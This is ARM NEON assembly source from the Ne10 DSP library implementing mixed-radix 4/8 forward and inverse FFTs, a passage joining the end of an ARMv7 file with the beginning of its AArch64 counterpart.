vmul.f32 q_s7, q_s7, d_tw_twn[1] @ scale by -1/sqrt(2)
/* radix 2 butterfly */
vadd.f32 q_s8, q_sin0, q_sin4
vadd.f32 q_s9, q_sin1, q_sin5
vsub.f32 q_s10, q_sin0, q_sin4
vsub.f32 q_s11, q_sin1, q_sin5
/* radix 2 butterfly */
vadd.f32 q_s12, q_sin2, q_sin6
vadd.f32 q_s13, q_s3, q_s7
vsub.f32 q_s14, q_sin2, q_sin6
vsub.f32 q_s15, q_s3, q_s7
vsub.f32 q_out4, q_s8, q_s12
vsub.f32 q_out5, q_s9, q_s13
vadd.f32 q_out0, q_s8, q_s12
vadd.f32 q_out1, q_s9, q_s13
.ifeqs "\inverse", "TRUE"
vsub.f32 d_out2_r, d_s10_r, d_s14_i
vadd.f32 d_out2_i, d_s10_i, d_s14_r
vsub.f32 d_out3_r, d_s11_r, d_s15_i
vadd.f32 d_out3_i, d_s11_i, d_s15_r
vadd.f32 d_out6_r, d_s10_r, d_s14_i
vsub.f32 d_out6_i, d_s10_i, d_s14_r
vadd.f32 d_out7_r, d_s11_r, d_s15_i
vsub.f32 d_out7_i, d_s11_i, d_s15_r
.else
vadd.f32 d_out2_r, d_s10_r, d_s14_i
vsub.f32 d_out2_i, d_s10_i, d_s14_r
vadd.f32 d_out3_r, d_s11_r, d_s15_i
vsub.f32 d_out3_i, d_s11_i, d_s15_r
vsub.f32 d_out6_r, d_s10_r, d_s14_i
vadd.f32 d_out6_i, d_s10_i, d_s14_r
vsub.f32 d_out7_r, d_s11_r, d_s15_i
vadd.f32 d_out7_i, d_s11_i, d_s15_r
.endif
vtrn.32 q_out0, q_out1 @ re-interleave the two butterflies for storing
vtrn.32 q_out2, q_out3
vtrn.32 q_out4, q_out5
vtrn.32 q_out6, q_out7
vst2.32 {q_out0}, [p_out1]!
vst2.32 {q_out2}, [p_out1]!
vst2.32 {q_out4}, [p_out1]!
vst2.32 {q_out6}, [p_out1]!
vst2.32 {q_out1}, [p_out1]!
vst2.32 {q_out3}, [p_out1]!
vst2.32 {q_out5}, [p_out1]!
vst2.32 {q_out7}, [p_out1]!
sub p_in1, p_in1, fstep, lsl #3 @ rewind the 8 fstep-strided loads...
add p_in1, p_in1, #16 @ ...and step to the next 2 complex columns
.endm
.align 4
/* Radix-8 twiddle constants (+/- 1/sqrt(2)), read via adr/vld1 in
 * BUTTERFLY8X2_WITHOUT_TWIDDLES. */
.L_TW_81:
.float 0.70710678
.float -0.70710678
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_forward_float32_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_float32_neon:
/* In: r0 = Fout, r1 = Fin, r2 = factors, r3 = twiddles.
 * After the prologue (40 B of r4-r12/lr + 64 B of q4-q7), the first
 * stack argument is at [sp, #104]; it is only used in the buffer swap
 * below, presumably a caller-provided scratch buffer — verify against
 * the C caller. */
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
/* pre-load inputs; the macro prefetches the next iteration itself */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "FALSE"
subs count, count, #2
bgt .L_ne10_radix4_butterfly_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* first stack argument: scratch buffer */
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "FALSE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* first stack argument: scratch buffer */
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
/* pre-load inputs; the twiddled macro prefetches subsequent ones */
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5 /* p_out1 = p_fout + (fstride-count_f)*mstride*4 complex values */
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* final results go to the caller's Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_float32_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_backward_float32_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_float32_neon:
/* Backward (inverse) variant of the forward routine above; uses the
 * conjugate butterflies and scales the last stage by 1/nfft.
 * After the prologue (40 B of r4-r12/lr + 64 B of q4-q7 + 8 B of
 * s0/s1), the first stack argument is at [sp, #112]. */
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* calculate 1/nfft for the last stage; nfft = radix * fstride */
mul tmp0, radix, fstride
vmov s1, tmp0
vmov.f32 s0, #1.0
vcvt.f32.s32 s1, s1
vdiv.f32 s0, s0, s1
vpush {s0, s1} /* keep 1/nfft at [sp]; the last-stage macro reloads it */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
/* pre-load inputs; the macro prefetches the next iteration itself */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "TRUE"
subs count, count, #2
bgt .L_ne10_radix4_butterfly_inverse_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #112] /* first stack argument: scratch buffer */
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_inverse_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_inverse_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "TRUE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_inverse_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #112] /* first stack argument: scratch buffer */
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
/* pre-load inputs; the twiddled macro prefetches subsequent ones */
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5 /* p_out1 = p_fout + (fstride-count_f)*mstride*4 complex values */
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* final results go to the caller's Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_end:
/*Return From Function*/
vpop {s0, s1}
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_backward_float32_neon */
/* end of the file */
.end
|
open-vela/external_Ne10 | 38,425 | modules/dsp/NE10_fft_float32.neonv8.S | /*
* Copyright 2014-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : dsp/NE10_fft_float32.neonv8.S
*/
.text
/* ARM register aliases */
#define p_fout x0
#define p_fin x1
#define p_factors x2
#define p_twiddles x3
#define p_buffer x4
#define stage_count x5
#define fstride x6
#define mstride x7
#define p_out_ls x17
#define radix x8
#define p_fin0 x9
#define p_fin1 x10
#define p_fin2 x11
#define p_fin3 x12
#define p_tmp x13
#define count x14
#define fstride1 x15
#define fstep x8
#define nstep x9
#define mstep x10
#define count_f x11
#define count_m x12
#define p_tw1 x13
#define p_in1 x14
#define p_out1 x15
#define tmp0 x16
/* NEON register aliases for the first stage */
#define q_in0_r v0.4s
#define q_in0_i v1.4s
#define q_in1_r v2.4s
#define q_in1_i v3.4s
#define q_in2_r v4.4s
#define q_in2_i v5.4s
#define q_in3_r v6.4s
#define q_in3_i v7.4s
#define q_s0_r v8.4s
#define q_s0_i v9.4s
#define q_s1_r v10.4s
#define q_s1_i v11.4s
#define q_s2_r v12.4s
#define q_s2_i v13.4s
#define q_s3_r v14.4s
#define q_s3_i v15.4s
#define q_out0_r v16.4s
#define q_out0_i v17.4s
#define q_out1_r v18.4s
#define q_out1_i v19.4s
#define q_out2_r v20.4s
#define q_out2_i v21.4s
#define q_out3_r v22.4s
#define q_out3_i v23.4s
#define q_out_r0246 v8.4s
#define q_out_i0246 v9.4s
#define q_out_r1357 v10.4s
#define q_out_i1357 v11.4s
#define q_out_r8ace v12.4s
#define q_out_i8ace v13.4s
#define q_out_r9bdf v14.4s
#define q_out_i9bdf v15.4s
#define q_in4_r v8.4s
#define q_in4_i v9.4s
#define q_in5_r v10.4s
#define q_in5_i v11.4s
#define q_in6_r v12.4s
#define q_in6_i v13.4s
#define q_in7_r v14.4s
#define q_in7_i v15.4s
#define q_sin0_r v16.4s
#define q_sin0_i v17.4s
#define q_sin1_r v18.4s
#define q_sin1_i v19.4s
#define q_sin2_r v20.4s
#define q_sin2_i v21.4s
#define q_sin3_r v22.4s
#define q_sin3_i v23.4s
#define q_sin4_r v24.4s
#define q_sin4_i v25.4s
#define q_sin5_r v26.4s
#define q_sin5_i v27.4s
#define q_sin6_r v28.4s
#define q_sin6_i v29.4s
#define q_sin7_r v30.4s
#define q_sin7_i v31.4s
#define d_tw_twn v0.2s
#define q_s5_r v12.4s
#define q_s5_i v13.4s
#define q_s7_r v10.4s
#define q_s7_i v11.4s
#define q_s8_r v0.4s
#define q_s8_i v1.4s
#define q_s9_r v2.4s
#define q_s9_i v3.4s
#define q_s10_r v4.4s
#define q_s10_i v5.4s
#define q_s11_r v6.4s
#define q_s11_i v7.4s
#define q_s12_r v8.4s
#define q_s12_i v9.4s
#define q_s13_r v16.4s
#define q_s13_i v17.4s
#define q_s14_r v18.4s
#define q_s14_i v19.4s
#define q_s15_r v24.4s
#define q_s15_i v25.4s
#define q_out_r0 v10.4s
#define q_out_i0 v11.4s
#define q_out_r1 v12.4s
#define q_out_i1 v13.4s
#define q_out_r2 v14.4s
#define q_out_i2 v15.4s
#define q_out_r3 v20.4s
#define q_out_i3 v21.4s
#define q_out_r4 v22.4s
#define q_out_i4 v23.4s
#define q_out_r5 v26.4s
#define q_out_i5 v27.4s
#define q_out_r6 v28.4s
#define q_out_i6 v29.4s
#define q_out_r7 v30.4s
#define q_out_i7 v31.4s
#define q_out_r028a v16.4s
#define q_out_i028a v18.4s
#define q_out_r139b v0.4s
#define q_out_i139b v2.4s
#define q_out_r46ce v4.4s
#define q_out_i46ce v6.4s
#define q_out_r57df v8.4s
#define q_out_i57df v10.4s
#define q_out_r028a_h v17.4s
#define q_out_i028a_h v19.4s
#define q_out_r139b_h v1.4s
#define q_out_i139b_h v3.4s
#define q_out_r46ce_h v5.4s
#define q_out_i46ce_h v7.4s
#define q_out_r57df_h v9.4s
#define q_out_i57df_h v11.4s
#define q_out0_r0246 v12.4s
#define q_out0_i0246 v13.4s
#define q_out1_r1357 v14.4s
#define q_out1_i1357 v15.4s
#define q_out2_r8ace v20.4s
#define q_out2_i8ace v21.4s
#define q_out3_r9bdf v22.4s
#define q_out3_i9bdf v23.4s
#define q_out0_r0246_h v24.4s
#define q_out0_i0246_h v25.4s
#define q_out1_r1357_h v26.4s
#define q_out1_i1357_h v27.4s
#define q_out2_r8ace_h v28.4s
#define q_out2_i8ace_h v29.4s
#define q_out3_r9bdf_h v30.4s
#define q_out3_i9bdf_h v31.4s
/* NEON register aliases for the mstride loop */
#define q_tw0_r v8.4s
#define q_tw0_i v9.4s
#define q_tw1_r v10.4s
#define q_tw1_i v11.4s
#define q_tw2_r v12.4s
#define q_tw2_i v13.4s
#define q_scr1_r v14.4s
#define q_scr1_i v15.4s
#define q_scr2_r v16.4s
#define q_scr2_i v17.4s
#define q_scr3_r v18.4s
#define q_scr3_i v19.4s
#define q_scr4_r v20.4s
#define q_scr4_i v21.4s
#define q_scr5_r v22.4s
#define q_scr5_i v23.4s
#define q_scr6_r v24.4s
#define q_scr6_i v25.4s
#define q_scr7_r v26.4s
#define q_scr7_i v27.4s
#define q_fout0_r v14.4s
#define q_fout0_i v15.4s
#define q_fout1_r v16.4s
#define q_fout1_i v17.4s
#define q_fout2_r v18.4s
#define q_fout2_i v19.4s
#define q_fout3_r v20.4s
#define q_fout3_i v21.4s
#define d_one_by_nfft v31.2s
#define q_one_by_nfft v31.4s
/* radix 4 butterfly without twiddles */
.macro BUTTERFLY4X4_WITHOUT_TWIDDLES inverse
fadd q_s0_r, q_in0_r, q_in2_r
fadd q_s0_i, q_in0_i, q_in2_i
fsub q_s1_r, q_in0_r, q_in2_r
fsub q_s1_i, q_in0_i, q_in2_i
fadd q_s2_r, q_in1_r, q_in3_r
fadd q_s2_i, q_in1_i, q_in3_i
fsub q_s3_r, q_in1_r, q_in3_r
fsub q_s3_i, q_in1_i, q_in3_i
ld2 {q_in0_r, q_in0_i}, [p_fin0], #32
ld2 {q_in2_r, q_in2_i}, [p_fin2], #32
ld2 {q_in1_r, q_in1_i}, [p_fin1], #32
ld2 {q_in3_r, q_in3_i}, [p_fin3], #32
fsub q_out2_r, q_s0_r, q_s2_r
fsub q_out2_i, q_s0_i, q_s2_i
fadd q_out0_r, q_s0_r, q_s2_r
fadd q_out0_i, q_s0_i, q_s2_i
.ifeqs "\inverse", "TRUE"
fsub q_out1_r, q_s1_r, q_s3_i
fadd q_out1_i, q_s1_i, q_s3_r
fadd q_out3_r, q_s1_r, q_s3_i
fsub q_out3_i, q_s1_i, q_s3_r
.else
fadd q_out1_r, q_s1_r, q_s3_i
fsub q_out1_i, q_s1_i, q_s3_r
fsub q_out3_r, q_s1_r, q_s3_i
fadd q_out3_i, q_s1_i, q_s3_r
.endif
zip1 q_out_r0246, q_out0_r, q_out2_r
zip2 q_out_r8ace, q_out0_r, q_out2_r
zip1 q_out_r1357, q_out1_r, q_out3_r
zip2 q_out_r9bdf, q_out1_r, q_out3_r
zip1 q_out_i0246, q_out0_i, q_out2_i
zip2 q_out_i8ace, q_out0_i, q_out2_i
zip1 q_out_i1357, q_out1_i, q_out3_i
zip2 q_out_i9bdf, q_out1_i, q_out3_i
st4 {q_out_r0246, q_out_i0246, q_out_r1357, q_out_i1357}, [p_tmp], #64
st4 {q_out_r8ace, q_out_i8ace, q_out_r9bdf, q_out_i9bdf}, [p_tmp], #64
.endm
/* radix 4 butterfly with twiddles */
/*
 * BUTTERFLY4X4_WITH_TWIDDLES \inverse, \last_stage
 *
 * Radix-4 butterfly with twiddle multiplication for all stages after the
 * first, four complex float32 values per leg.  On entry q_in0..q_in3 and
 * q_tw0..q_tw2 hold the current data/twiddles (pre-loaded by the caller
 * or the previous iteration); the macro rewinds p_in1/p_tw1 to the next
 * column and reloads while the arithmetic is in flight.
 * \inverse == "TRUE": twiddles are applied conjugated and the j-rotation
 * sign is flipped (IFFT).  \last_stage == "TRUE" (inverse path only):
 * every output is additionally scaled by 1/nfft, which the function
 * prologue left at [sp].
 * Results go out through p_out1 with stride mstep; p_out1 is then rewound
 * by 4*mstep and advanced 32 B for the next group.
 */
.macro BUTTERFLY4X4_WITH_TWIDDLES inverse, last_stage
/* step input/twiddle pointers back to the start of the next column */
sub p_in1, p_in1, nstep, lsl #2
add p_in1, p_in1, #32
sub p_tw1, p_tw1, mstep, lsl #1
add p_tw1, p_tw1, #32
/* complex multiply in{1,2,3} * tw{0,1,2}: real-part products first */
fmul q_scr1_r, q_in1_r, q_tw0_r
fmul q_scr1_i, q_in1_i, q_tw0_r
fmul q_scr2_r, q_in2_r, q_tw1_r
fmul q_scr2_i, q_in2_i, q_tw1_r
fmul q_scr3_r, q_in3_r, q_tw2_r
fmul q_scr3_i, q_in3_i, q_tw2_r
.ifeqs "\inverse", "TRUE"
/* accumulate with conjugated twiddles: (a+jb)(c-jd) */
fmla q_scr1_r, q_in1_i, q_tw0_i
fmls q_scr1_i, q_in1_r, q_tw0_i
fmla q_scr2_r, q_in2_i, q_tw1_i
fmls q_scr2_i, q_in2_r, q_tw1_i
fmla q_scr3_r, q_in3_i, q_tw2_i
fmls q_scr3_i, q_in3_r, q_tw2_i
.else
/* accumulate with plain twiddles: (a+jb)(c+jd) */
fmls q_scr1_r, q_in1_i, q_tw0_i
fmla q_scr1_i, q_in1_r, q_tw0_i
fmls q_scr2_r, q_in2_i, q_tw1_i
fmla q_scr2_i, q_in2_r, q_tw1_i
fmls q_scr3_r, q_in3_i, q_tw2_i
fmla q_scr3_i, q_in3_r, q_tw2_i
.endif
/* radix-2 combines of the twiddled inputs */
fadd q_scr4_r, q_in0_r, q_scr2_r
fadd q_scr4_i, q_in0_i, q_scr2_i
fsub q_scr5_r, q_in0_r, q_scr2_r
fsub q_scr5_i, q_in0_i, q_scr2_i
fadd q_scr6_r, q_scr1_r, q_scr3_r
fadd q_scr6_i, q_scr1_i, q_scr3_i
fsub q_scr7_r, q_scr1_r, q_scr3_r
fsub q_scr7_i, q_scr1_i, q_scr3_i
/* reload data/twiddles for the next iteration (hides load latency) */
ld2 {q_in0_r, q_in0_i}, [p_in1], nstep
ld2 {q_in1_r, q_in1_i}, [p_in1], nstep
ld2 {q_in2_r, q_in2_i}, [p_in1], nstep
ld2 {q_in3_r, q_in3_i}, [p_in1], nstep
ld2 {q_tw0_r, q_tw0_i}, [p_tw1], mstep
ld2 {q_tw1_r, q_tw1_i}, [p_tw1], mstep
ld2 {q_tw2_r, q_tw2_i}, [p_tw1]
.ifeqs "\inverse", "TRUE"
.ifeqs "\last_stage", "TRUE"
/* broadcast the 1/nfft scale the prologue stored at [sp] */
ld1 {d_one_by_nfft}, [sp]
dup q_one_by_nfft, d_one_by_nfft[0]
.endif
.endif
fadd q_fout0_r, q_scr4_r, q_scr6_r
fadd q_fout0_i, q_scr4_i, q_scr6_i
fsub q_fout2_r, q_scr4_r, q_scr6_r
fsub q_fout2_i, q_scr4_i, q_scr6_i
.ifeqs "\inverse", "TRUE"
/* odd outputs with +j rotation (inverse transform) */
fsub q_fout1_r, q_scr5_r, q_scr7_i
fadd q_fout1_i, q_scr5_i, q_scr7_r
fadd q_fout3_r, q_scr5_r, q_scr7_i
fsub q_fout3_i, q_scr5_i, q_scr7_r
.else
/* odd outputs with -j rotation (forward transform) */
fadd q_fout1_r, q_scr5_r, q_scr7_i
fsub q_fout1_i, q_scr5_i, q_scr7_r
fsub q_fout3_r, q_scr5_r, q_scr7_i
fadd q_fout3_i, q_scr5_i, q_scr7_r
.endif
.ifeqs "\inverse", "TRUE"
.ifeqs "\last_stage", "TRUE"
/* IFFT normalisation: scale every output by 1/nfft */
fmul q_fout0_r, q_fout0_r, q_one_by_nfft
fmul q_fout0_i, q_fout0_i, q_one_by_nfft
fmul q_fout2_r, q_fout2_r, q_one_by_nfft
fmul q_fout2_i, q_fout2_i, q_one_by_nfft
fmul q_fout1_r, q_fout1_r, q_one_by_nfft
fmul q_fout1_i, q_fout1_i, q_one_by_nfft
fmul q_fout3_r, q_fout3_r, q_one_by_nfft
fmul q_fout3_i, q_fout3_i, q_one_by_nfft
.endif
.endif
st2 {q_fout0_r, q_fout0_i}, [p_out1], mstep
st2 {q_fout1_r, q_fout1_i}, [p_out1], mstep
st2 {q_fout2_r, q_fout2_i}, [p_out1], mstep
st2 {q_fout3_r, q_fout3_i}, [p_out1], mstep
/* rewind the output pointer and move to the next 32-B group */
sub p_out1, p_out1, mstep, lsl #2
add p_out1, p_out1, #32
.endm
/* radix 8 butterfly without twiddles */
/*
 * BUTTERFLY8X4_WITHOUT_TWIDDLES \inverse
 *
 * Radix-8 butterfly for the first FFT stage (all stage twiddles 1 except
 * the fixed +/-(1/sqrt(2)) factors loaded from .L_TW_81), four complex
 * float32 values per leg.  Loads all eight legs from p_in1 with stride
 * fstep, then rewinds p_in1 by 8*fstep and advances it 32 B at the end.
 * \inverse == "TRUE" selects the IFFT sign convention.  Outputs are
 * transposed via the zip1/zip2 cascade and stored through p_tmp
 * (advanced 256 B per call).
 *
 * Fix vs. previous revision: the forward-path `shl ..., 0` immediate is
 * written `#0` to match the inverse path (identical encoding in GAS;
 * consistency only).
 */
.macro BUTTERFLY8X4_WITHOUT_TWIDDLES inverse
/**
 * q_in0: Fin1[0]
 * q_in1: Fin1[0 + fstride]
 * q_in2: Fin1[fstride1]
